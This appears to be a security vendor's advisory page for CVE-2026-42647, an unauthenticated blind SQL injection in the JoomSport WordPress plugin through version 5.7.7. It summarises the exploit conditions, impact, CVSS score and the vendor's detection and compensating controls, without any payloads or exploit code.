How is CVE-2026-42647 exploited?

Network reachability (required): The attacker must reach the WordPress site over the network; the vulnerable plugin endpoint is exposed via standard HTTP/HTTPS, so any internet-facing deployment is reachable without any special network position. Authentication (not-required): No account or session token is needed; the injection point is accessible to unauthenticated requests. Victim interaction (not-required): The attacker sends crafted requests directly to the server; no user action or click is required to trigger the vulnerability. Attack complexity (info): Attack complexity is low, meaning the exploit is reliable and repeatable with no dependency on race conditions, memory layout, or other environmental factors.

What is the impact of CVE-2026-42647?

Reads any data stored in the WordPress database using blind SQL injection techniques, including usernames, hashed passwords, and email addresses for all registered users. Extracts active session tokens and authentication secrets (such as WordPress secret keys and salts if stored in the database), enabling account takeover without knowing user passwords. Reads custom plugin and application data tables, which may include personally identifiable information, order records, or sports league data managed by JoomSport. Causes availability disruption to the database layer through resource-intensive blind injection queries, degrading or crashing the affected WordPress service.

Back to search

CRITICALCVE-2026-42647Published 2026-06-11Modified 2026-06-12CNA Patchstack

CVE-2026-42647: WordPress JoomSport plugin <= 5.7.7 - SQL Injection vulnerability

Q: What is CVE-2026-42647?

SQL injection in the JoomSport WordPress plugin (versions up to and including 5.7.7) allows an unauthenticated remote attacker to send crafted HTTP requests directly to the affected WordPress site. No login or user interaction is required. Successful exploitation exposes the full WordPress database to blind SQL injection reads, giving the attacker access to stored credentials, session tokens, and all application data, with secondary potential to disrupt database availability. No fix version has been published; HarborGuard tracks this advisory and will make a patched-image rebuild available as soon as the upstream maintainer releases one.

Q: Is CVE-2026-42647 patched?

Because no upstream fix has been published, HarborGuard re-checks this advisory on every ingest cycle and will make a patched-image rebuild available the moment a remediated release appears. In the interim, customers can apply compensating controls through HarborGuard's network-policy recommendations to restrict external access to affected WordPress instances.

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection. This issue affects JoomSport: from n/a through 5.7.7.

CVSS v3.1: 9.3
Severity: CRITICAL
Fixed in: —
Affected Products: 1

HarborGuard Analysis

Synopsis

SQL injection in the JoomSport WordPress plugin (versions up to and including 5.7.7) allows an unauthenticated remote attacker to send crafted HTTP requests directly to the affected WordPress site. No login or user interaction is required. Successful exploitation exposes the full WordPress database to blind SQL injection reads, giving the attacker access to stored credentials, session tokens, and all application data, with secondary potential to disrupt database availability. No fix version has been published; HarborGuard tracks this advisory and will make a patched-image rebuild available as soon as the upstream maintainer releases one.

HarborGuard Coverage

Detection

Detection is available across every HarborGuard environment: the CVE is ingested from upstream advisory feeds within minutes of publication and matched against customer images, including custom-built WordPress images that bundle the JoomSport plugin. Any image carrying JoomSport at or below version 5.7.7 is flagged automatically.

Available

Triage

HarborGuard scores this vulnerability at CVSS 9.3 (Critical) and weights it further against each environment's compliance policy to determine urgency and routing. Findings are surfaced to the team or inbox designated by each customer org's escalation rules, so the right people see it without manual triage.

Available

Patch

Because no upstream fix has been published, HarborGuard re-checks this advisory on every ingest cycle and will make a patched-image rebuild available the moment a remediated release appears. In the interim, customers can apply compensating controls through HarborGuard's network-policy recommendations to restrict external access to affected WordPress instances.

Pending upstream

Exploit Conditions

Network reachabilityRequired
The attacker must reach the WordPress site over the network; the vulnerable plugin endpoint is exposed via standard HTTP/HTTPS, so any internet-facing deployment is reachable without any special network position.
AuthenticationNot required
No account or session token is needed; the injection point is accessible to unauthenticated requests.
Victim interactionNot required
The attacker sends crafted requests directly to the server; no user action or click is required to trigger the vulnerability.
Attack complexityDetail
Attack complexity is low, meaning the exploit is reliable and repeatable with no dependency on race conditions, memory layout, or other environmental factors.

Blast Radius

Reads any data stored in the WordPress database using blind SQL injection techniques, including usernames, hashed passwords, and email addresses for all registered users.
Extracts active session tokens and authentication secrets (such as WordPress secret keys and salts if stored in the database), enabling account takeover without knowing user passwords.
Reads custom plugin and application data tables, which may include personally identifiable information, order records, or sports league data managed by JoomSport.
Causes availability disruption to the database layer through resource-intensive blind injection queries, degrading or crashing the affected WordPress service.

How HarborGuard Handles This

Available on HarborGuard: this CVE is matched against every customer image that includes the JoomSport plugin at or below version 5.7.7, with findings scored at Critical (CVSS 9.3) and routed per each org's compliance policy. Because no upstream patch exists at this time, HarborGuard monitors the Patchstack advisory feed on every ingest cycle and will generate a patched-image rebuild and, for customers with auto-remediation enabled, open a PR against affected workloads the moment a fix version is published. While awaiting the upstream fix, compensating controls are available: applying Kubernetes or cloud network policies to restrict inbound HTTP traffic to trusted sources, enabling egress filtering to limit lateral data exfiltration, and disabling or feature-flag-gating the JoomSport plugin in non-essential environments all reduce exposure without requiring a code-level patch.

See how HarborGuard automates this

Affected packages

Beardev / JoomSport
≤ 5.7.7

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

References

patchstack.com

Metrics

Get notified